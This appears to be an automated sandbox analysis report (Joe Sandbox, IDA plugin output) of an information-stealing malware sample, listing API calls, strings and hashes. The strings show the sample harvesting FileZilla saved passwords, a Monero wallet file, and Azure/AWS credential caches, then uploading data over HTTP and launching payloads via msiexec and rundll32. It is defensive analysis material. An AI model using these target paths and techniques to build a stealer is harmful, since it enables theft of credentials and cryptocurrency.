                  • Source File: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 6{
                  • API String ID: 0-100773482
                  • Opcode ID: 6b6f2f381737239cf7cb1f10fc8325c3911b36fa0101f33bab6386f48a170404
                  • Instruction ID: 27177c02577babffcd5923714a30b7e441b58f3ae7ff41de21f561d2726c7803
                  • Opcode Fuzzy Hash: 6b6f2f381737239cf7cb1f10fc8325c3911b36fa0101f33bab6386f48a170404
                  • Instruction Fuzzy Hash: 20B126F3A082009FE7109E2CDD8176AB7E5EB94711F2A453DDEC8D3B44E6399C098796
                  APIs
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                    • Part of subcall function 0088A920: lstrcpy.KERNEL32(00000000,?), ref: 0088A972
                    • Part of subcall function 0088A920: lstrcat.KERNEL32(00000000), ref: 0088A982
                    • Part of subcall function 0088A9B0: lstrlen.KERNEL32(?,015D8A80,?,\Monero\wallet.keys,00890E17), ref: 0088A9C5
                    • Part of subcall function 0088A9B0: lstrcpy.KERNEL32(00000000), ref: 0088AA04
                    • Part of subcall function 0088A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0088AA12
                    • Part of subcall function 0088A8A0: lstrcpy.KERNEL32(?,00890E17), ref: 0088A905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,008915B8,00890D96), ref: 0087F71E
                  • StrCmpCA.SHLWAPI(?,008915BC), ref: 0087F76F
                  • StrCmpCA.SHLWAPI(?,008915C0), ref: 0087F785
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0087FAB1
                  • FindClose.KERNEL32(000000FF), ref: 0087FAC3
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID:
                  • API String ID: 3334442632-0
                  • Opcode ID: 186068873348a63ff133bbcc0174ed816ad4a5a8b4042ed03375d6d463d97be9
                  • Instruction ID: 3c57a034743153d1db2a27ad6ffedd1094efa76ca792ab6408e5fc1be717f94e
                  • Opcode Fuzzy Hash: 186068873348a63ff133bbcc0174ed816ad4a5a8b4042ed03375d6d463d97be9
                  • Instruction Fuzzy Hash: D71163318041599BEB18FBA4DC959ED7378FB10300F4042A6A51AD64D2EF346B4ACB63
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: z&B
                  • API String ID: 0-3697102250
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: )uo[
                  • API String ID: 0-2962778631
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 7r9
                  • API String ID: 0-1709151655
                  Memory Dump Source
                  • Source File: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  Memory Dump Source
                  • Source File: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  Memory Dump Source
                  • Source File: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  Memory Dump Source
                  • Source File: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  Memory Dump Source
                  • Source File: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  Memory Dump Source
                  • Source File: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  APIs
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                    • Part of subcall function 00888DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00888E0B
                    • Part of subcall function 0088A920: lstrcpy.KERNEL32(00000000,?), ref: 0088A972
                    • Part of subcall function 0088A920: lstrcat.KERNEL32(00000000), ref: 0088A982
                    • Part of subcall function 0088A8A0: lstrcpy.KERNEL32(?,00890E17), ref: 0088A905
                    • Part of subcall function 0088A9B0: lstrlen.KERNEL32(?,015D8A80,?,\Monero\wallet.keys,00890E17), ref: 0088A9C5
                    • Part of subcall function 0088A9B0: lstrcpy.KERNEL32(00000000), ref: 0088AA04
                    • Part of subcall function 0088A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0088AA12
                    • Part of subcall function 0088A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0088A7E6
                    • Part of subcall function 008799C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008799EC
                    • Part of subcall function 008799C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00879A11
                    • Part of subcall function 008799C0: LocalAlloc.KERNEL32(00000040,?), ref: 00879A31
                    • Part of subcall function 008799C0: ReadFile.KERNEL32(000000FF,?,00000000,0087148F,00000000), ref: 00879A5A
                    • Part of subcall function 008799C0: LocalFree.KERNEL32(0087148F), ref: 00879A90
                    • Part of subcall function 008799C0: CloseHandle.KERNEL32(000000FF), ref: 00879A9A
                    • Part of subcall function 00888E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00888E52
                  • GetProcessHeap.KERNEL32(00000000,000F423F,00890DBA,00890DB7,00890DB6,00890DB3), ref: 00880362
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00880369
                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 00880385
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00890DB2), ref: 00880393
                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 008803CF
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00890DB2), ref: 008803DD
                  • StrStrA.SHLWAPI(00000000,<User>), ref: 00880419
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00890DB2), ref: 00880427
                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00880463
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00890DB2), ref: 00880475
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00890DB2), ref: 00880502
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00890DB2), ref: 0088051A
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00890DB2), ref: 00880532
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00890DB2), ref: 0088054A
                  • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00880562
                  • lstrcat.KERNEL32(?,profile: null), ref: 00880571
                  • lstrcat.KERNEL32(?,url: ), ref: 00880580
                  • lstrcat.KERNEL32(?,00000000), ref: 00880593
                  • lstrcat.KERNEL32(?,00891678), ref: 008805A2
                  • lstrcat.KERNEL32(?,00000000), ref: 008805B5
                  • lstrcat.KERNEL32(?,0089167C), ref: 008805C4
                  • lstrcat.KERNEL32(?,login: ), ref: 008805D3
                  • lstrcat.KERNEL32(?,00000000), ref: 008805E6
                  • lstrcat.KERNEL32(?,00891688), ref: 008805F5
                  • lstrcat.KERNEL32(?,password: ), ref: 00880604
                  • lstrcat.KERNEL32(?,00000000), ref: 00880617
                  • lstrcat.KERNEL32(?,00891698), ref: 00880626
                  • lstrcat.KERNEL32(?,0089169C), ref: 00880635
                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00890DB2), ref: 0088068E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                  • API String ID: 1942843190-555421843
                  • Opcode ID: 4537f5b3aecc2315c6138eaaddbb6ffba4869ada2731ab80dc6d810e03f90c1f
                  • Instruction ID: 62037d7ea8b6aa823d413bcfeb62ff03f1820240c5da781902b93c8e39a2528e
                  • Opcode Fuzzy Hash: 4537f5b3aecc2315c6138eaaddbb6ffba4869ada2731ab80dc6d810e03f90c1f
                  • Instruction Fuzzy Hash: 9ED11F71900108ABDB08FBE4DD96DEE7778FF64700F544519F112E61D2EE38AA46CB62
                  APIs
                    • Part of subcall function 0088A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0088A7E6
                    • Part of subcall function 008747B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00874839
                    • Part of subcall function 008747B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00874849
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 008759F8
                  • StrCmpCA.SHLWAPI(?,015DE4A0), ref: 00875A13
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00875B93
                  • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,015DE4B0,00000000,?,015D9DF8,00000000,?,00891A1C), ref: 00875E71
                  • lstrlen.KERNEL32(00000000), ref: 00875E82
                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00875E93
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00875E9A
                  • lstrlen.KERNEL32(00000000), ref: 00875EAF
                  • lstrlen.KERNEL32(00000000), ref: 00875ED8
                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00875EF1
                  • lstrlen.KERNEL32(00000000,?,?), ref: 00875F1B
                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00875F2F
                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00875F4C
                  • InternetCloseHandle.WININET(00000000), ref: 00875FB0
                  • InternetCloseHandle.WININET(00000000), ref: 00875FBD
                  • HttpOpenRequestA.WININET(00000000,015DE530,?,015DDD58,00000000,00000000,00400100,00000000), ref: 00875BF8
                    • Part of subcall function 0088A9B0: lstrlen.KERNEL32(?,015D8A80,?,\Monero\wallet.keys,00890E17), ref: 0088A9C5
                    • Part of subcall function 0088A9B0: lstrcpy.KERNEL32(00000000), ref: 0088AA04
                    • Part of subcall function 0088A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0088AA12
                    • Part of subcall function 0088A8A0: lstrcpy.KERNEL32(?,00890E17), ref: 0088A905
                    • Part of subcall function 0088A920: lstrcpy.KERNEL32(00000000,?), ref: 0088A972
                    • Part of subcall function 0088A920: lstrcat.KERNEL32(00000000), ref: 0088A982
                  • InternetCloseHandle.WININET(00000000), ref: 00875FC7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                  • String ID: "$"$------$------$------
                  • API String ID: 874700897-2180234286
                  • Opcode ID: c54458814efeb05aa91d5ed71067c2cd3615bf2ec0593e75c988b7cc31470120
                  • Instruction ID: fe5a5eda0064ff71e8c4253f8901d101c94ef57281de93612a4f5ee31a9deaba
                  • Opcode Fuzzy Hash: c54458814efeb05aa91d5ed71067c2cd3615bf2ec0593e75c988b7cc31470120
                  • Instruction Fuzzy Hash: DB12EE71820118AAEB19FBA4DC95FDEB378FF14700F5041AAF116A21D1DF746A4ACB62
                  APIs
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                    • Part of subcall function 0088A9B0: lstrlen.KERNEL32(?,015D8A80,?,\Monero\wallet.keys,00890E17), ref: 0088A9C5
                    • Part of subcall function 0088A9B0: lstrcpy.KERNEL32(00000000), ref: 0088AA04
                    • Part of subcall function 0088A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0088AA12
                    • Part of subcall function 0088A8A0: lstrcpy.KERNEL32(?,00890E17), ref: 0088A905
                    • Part of subcall function 00888B60: GetSystemTime.KERNEL32(00890E1A,015D9C18,008905AE,?,?,008713F9,?,0000001A,00890E1A,00000000,?,015D8A80,?,\Monero\wallet.keys,00890E17), ref: 00888B86
                    • Part of subcall function 0088A920: lstrcpy.KERNEL32(00000000,?), ref: 0088A972
                    • Part of subcall function 0088A920: lstrcat.KERNEL32(00000000), ref: 0088A982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0087CF83
                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0087D0C7
                  • RtlAllocateHeap.NTDLL(00000000), ref: 0087D0CE
                  • lstrcat.KERNEL32(?,00000000), ref: 0087D208
                  • lstrcat.KERNEL32(?,00891478), ref: 0087D217
                  • lstrcat.KERNEL32(?,00000000), ref: 0087D22A
                  • lstrcat.KERNEL32(?,0089147C), ref: 0087D239
                  • lstrcat.KERNEL32(?,00000000), ref: 0087D24C
                  • lstrcat.KERNEL32(?,00891480), ref: 0087D25B
                  • lstrcat.KERNEL32(?,00000000), ref: 0087D26E
                  • lstrcat.KERNEL32(?,00891484), ref: 0087D27D
                  • lstrcat.KERNEL32(?,00000000), ref: 0087D290
                  • lstrcat.KERNEL32(?,00891488), ref: 0087D29F
                  • lstrcat.KERNEL32(?,00000000), ref: 0087D2B2
                  • lstrcat.KERNEL32(?,0089148C), ref: 0087D2C1
                  • lstrcat.KERNEL32(?,00000000), ref: 0087D2D4
                  • lstrcat.KERNEL32(?,00891490), ref: 0087D2E3
                    • Part of subcall function 0088A820: lstrlen.KERNEL32(00874F05,?,?,00874F05,00890DDE), ref: 0088A82B
                    • Part of subcall function 0088A820: lstrcpy.KERNEL32(00890DDE,00000000), ref: 0088A885
                  • lstrlen.KERNEL32(?), ref: 0087D32A
                  • lstrlen.KERNEL32(?), ref: 0087D339
                    • Part of subcall function 0088AA70: StrCmpCA.SHLWAPI(015D8850,0087A7A7,?,0087A7A7,015D8850), ref: 0088AA8F
                  • DeleteFileA.KERNEL32(00000000), ref: 0087D3B4
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                  • String ID:
                  • API String ID: 1956182324-0
                  • Opcode ID: f713b0207810c6c1df0b3e27803a4106a987905a61d6524155abbc9d2b3088ef
                  • Instruction ID: 48f418648bcca27aab5b1303159e109f937995cb83223f120de33f2413eb1bbf
                  • Opcode Fuzzy Hash: f713b0207810c6c1df0b3e27803a4106a987905a61d6524155abbc9d2b3088ef
                  • Instruction Fuzzy Hash: 4CE1DA71910108ABDB08FBA4DD96EEE7778FF14301F104169F506E61E2DE39AA06DB63
                  APIs
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                    • Part of subcall function 0088A920: lstrcpy.KERNEL32(00000000,?), ref: 0088A972
                    • Part of subcall function 0088A920: lstrcat.KERNEL32(00000000), ref: 0088A982
                    • Part of subcall function 0088A8A0: lstrcpy.KERNEL32(?,00890E17), ref: 0088A905
                    • Part of subcall function 0088A9B0: lstrlen.KERNEL32(?,015D8A80,?,\Monero\wallet.keys,00890E17), ref: 0088A9C5
                    • Part of subcall function 0088A9B0: lstrcpy.KERNEL32(00000000), ref: 0088AA04
                    • Part of subcall function 0088A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0088AA12
                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,015DCF70,00000000,?,0089144C,00000000,?,?), ref: 0087CA6C
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0087CA89
                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0087CA95
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0087CAA8
                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0087CAD9
                  • StrStrA.SHLWAPI(?,015DCF88,00890B52), ref: 0087CAF7
                  • StrStrA.SHLWAPI(00000000,015DCE20), ref: 0087CB1E
                  • StrStrA.SHLWAPI(?,015DD318,00000000,?,00891458,00000000,?,00000000,00000000,?,015D8830,00000000,?,00891454,00000000,?), ref: 0087CCA2
                  • StrStrA.SHLWAPI(00000000,015DD138), ref: 0087CCB9
                    • Part of subcall function 0087C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0087C871
                    • Part of subcall function 0087C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0087C87C
                  • StrStrA.SHLWAPI(?,015DD138,00000000,?,0089145C,00000000,?,00000000,015D8890), ref: 0087CD5A
                  • StrStrA.SHLWAPI(00000000,015D8B00), ref: 0087CD71
                    • Part of subcall function 0087C820: lstrcat.KERNEL32(?,00890B46), ref: 0087C943
                    • Part of subcall function 0087C820: lstrcat.KERNEL32(?,00890B47), ref: 0087C957
                    • Part of subcall function 0087C820: lstrcat.KERNEL32(?,00890B4E), ref: 0087C978
                  • lstrlen.KERNEL32(00000000), ref: 0087CE44
                  • CloseHandle.KERNEL32(00000000), ref: 0087CE9C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                  • String ID:
                  • API String ID: 3744635739-3916222277
                  • Opcode ID: d0f841b43524ffd22c268bac0752694c3440fdbf2e9287b6ab220cf960b30327
                  • Instruction ID: 2a47844f3d9675a3a94eff3cf530f7a35e1548cb5b7f2bf95893ac14981c15f2
                  • Opcode Fuzzy Hash: d0f841b43524ffd22c268bac0752694c3440fdbf2e9287b6ab220cf960b30327
                  • Instruction Fuzzy Hash: F8E1DF71910108ABDB18FBA8DC95FEEB778FF14300F40416AF516A6192EF346A46CB63
                  APIs
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                  • RegOpenKeyExA.ADVAPI32(00000000,015DB140,00000000,00020019,00000000,008905B6), ref: 008883A4
                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00888426
                  • wsprintfA.USER32 ref: 00888459
                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0088847B
                  • RegCloseKey.ADVAPI32(00000000), ref: 0088848C
                  • RegCloseKey.ADVAPI32(00000000), ref: 00888499
                    • Part of subcall function 0088A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0088A7E6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseOpenlstrcpy$Enumwsprintf
                  • String ID: - $%s\%s$?
                  • API String ID: 3246050789-3278919252
                  • Opcode ID: 5850a4c1f7037398e0d965bc4b91d478391ee2fcc065e335152f69a7e96c9fa4
                  • Instruction ID: a560273a0b27b70ba5cac6afcf0fe60ae610328c39a0dc6dc868a3a379c57ae3
                  • Opcode Fuzzy Hash: 5850a4c1f7037398e0d965bc4b91d478391ee2fcc065e335152f69a7e96c9fa4
                  • Instruction Fuzzy Hash: A8813D71910118ABEB28EB54CC95FEA77B8FF18700F4082D9E109E6191DF756B86CFA1
                  APIs
                    • Part of subcall function 00888DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00888E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 00884DB0
                  • lstrcat.KERNEL32(?,\.azure\), ref: 00884DCD
                    • Part of subcall function 00884910: wsprintfA.USER32 ref: 0088492C
                    • Part of subcall function 00884910: FindFirstFileA.KERNEL32(?,?), ref: 00884943
                  • lstrcat.KERNEL32(?,00000000), ref: 00884E3C
                  • lstrcat.KERNEL32(?,\.aws\), ref: 00884E59
                    • Part of subcall function 00884910: StrCmpCA.SHLWAPI(?,00890FDC), ref: 00884971
                    • Part of subcall function 00884910: StrCmpCA.SHLWAPI(?,00890FE0), ref: 00884987
                    • Part of subcall function 00884910: FindNextFileA.KERNEL32(000000FF,?), ref: 00884B7D
                    • Part of subcall function 00884910: FindClose.KERNEL32(000000FF), ref: 00884B92
                  • lstrcat.KERNEL32(?,00000000), ref: 00884EC8
                  • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00884EE5
                    • Part of subcall function 00884910: wsprintfA.USER32 ref: 008849B0
                    • Part of subcall function 00884910: StrCmpCA.SHLWAPI(?,008908D2), ref: 008849C5
                    • Part of subcall function 00884910: wsprintfA.USER32 ref: 008849E2
                    • Part of subcall function 00884910: PathMatchSpecA.SHLWAPI(?,?), ref: 00884A1E
                    • Part of subcall function 00884910: lstrcat.KERNEL32(?,015DE410), ref: 00884A4A
                    • Part of subcall function 00884910: lstrcat.KERNEL32(?,00890FF8), ref: 00884A5C
                    • Part of subcall function 00884910: lstrcat.KERNEL32(?,?), ref: 00884A70
                    • Part of subcall function 00884910: lstrcat.KERNEL32(?,00890FFC), ref: 00884A82
                    • Part of subcall function 00884910: lstrcat.KERNEL32(?,?), ref: 00884A96
                    • Part of subcall function 00884910: CopyFileA.KERNEL32(?,?,00000001), ref: 00884AAC
                    • Part of subcall function 00884910: DeleteFileA.KERNEL32(?), ref: 00884B31
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                  • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                  • API String ID: 949356159-974132213
                  • Opcode ID: 9dcd9eb85f7dc592085d77eae5caef92482a30a0fcfaad942b16afd905625675
                  • Instruction ID: eb93dabd15b28caf7c069d4ff9c2a20892ad26ba9d83bd1e278efaf857f3f023
                  • Opcode Fuzzy Hash: 9dcd9eb85f7dc592085d77eae5caef92482a30a0fcfaad942b16afd905625675
                  • Instruction Fuzzy Hash: 6241937A94420467DF14F7A0EC8BFE93238FB24700F004594B259E61C2EEB95B898B93
                  APIs
                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0088906C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateGlobalStream
                  • String ID: image/jpeg
                  • API String ID: 2244384528-3785015651
                  • Opcode ID: 0bcf7d77467c786d2d3c3841dc3cc4452a3145eb2a801c99431dc02db5824395
                  • Instruction ID: b822a428a7cc26897dd1b631b6fcfe3665a3457f07a4dbb7aebb295f626d51f2
                  • Opcode Fuzzy Hash: 0bcf7d77467c786d2d3c3841dc3cc4452a3145eb2a801c99431dc02db5824395
                  • Instruction Fuzzy Hash: FE71FCB5910208ABDB04EBE4DC89FEDB7B9FF58700F148608F515E7291DB34A945CB61
                  APIs
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                  • ShellExecuteEx.SHELL32(0000003C), ref: 008831C5
                  • ShellExecuteEx.SHELL32(0000003C), ref: 0088335D
                  • ShellExecuteEx.SHELL32(0000003C), ref: 008834EA
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExecuteShell$lstrcpy
                  • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                  • API String ID: 2507796910-3625054190
                  • Opcode ID: 24e3c71012521eed7c88a731d9348c10f0c177b702acb8fe09d7c59bce1c8485
                  • Instruction ID: daaa66ca6184e802bcb08985240e21bb5be24e968122f08ab3de2e33351bb5a2
                  • Opcode Fuzzy Hash: 24e3c71012521eed7c88a731d9348c10f0c177b702acb8fe09d7c59bce1c8485
                  • Instruction Fuzzy Hash: D112DC718001189AEB19FBA4DD92EDDB778FF14300F50416AE506A61D2EF382B4ACF63
                  APIs
                    • Part of subcall function 0088A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0088A7E6
                    • Part of subcall function 00876280: InternetOpenA.WININET(00890DFE,00000001,00000000,00000000,00000000), ref: 008762E1
                    • Part of subcall function 00876280: StrCmpCA.SHLWAPI(?,015DE4A0), ref: 00876303
                    • Part of subcall function 00876280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00876335
                    • Part of subcall function 00876280: HttpOpenRequestA.WININET(00000000,GET,?,015DDD58,00000000,00000000,00400100,00000000), ref: 00876385
                    • Part of subcall function 00876280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 008763BF
                    • Part of subcall function 00876280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008763D1
                    • Part of subcall function 0088A8A0: lstrcpy.KERNEL32(?,00890E17), ref: 0088A905
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00885318
                  • lstrlen.KERNEL32(00000000), ref: 0088532F
                    • Part of subcall function 00888E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00888E52
                  • StrStrA.SHLWAPI(00000000,00000000), ref: 00885364
                  • lstrlen.KERNEL32(00000000), ref: 00885383
                  • lstrlen.KERNEL32(00000000), ref: 008853AE
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  Joe Sandbox IDA Plugin
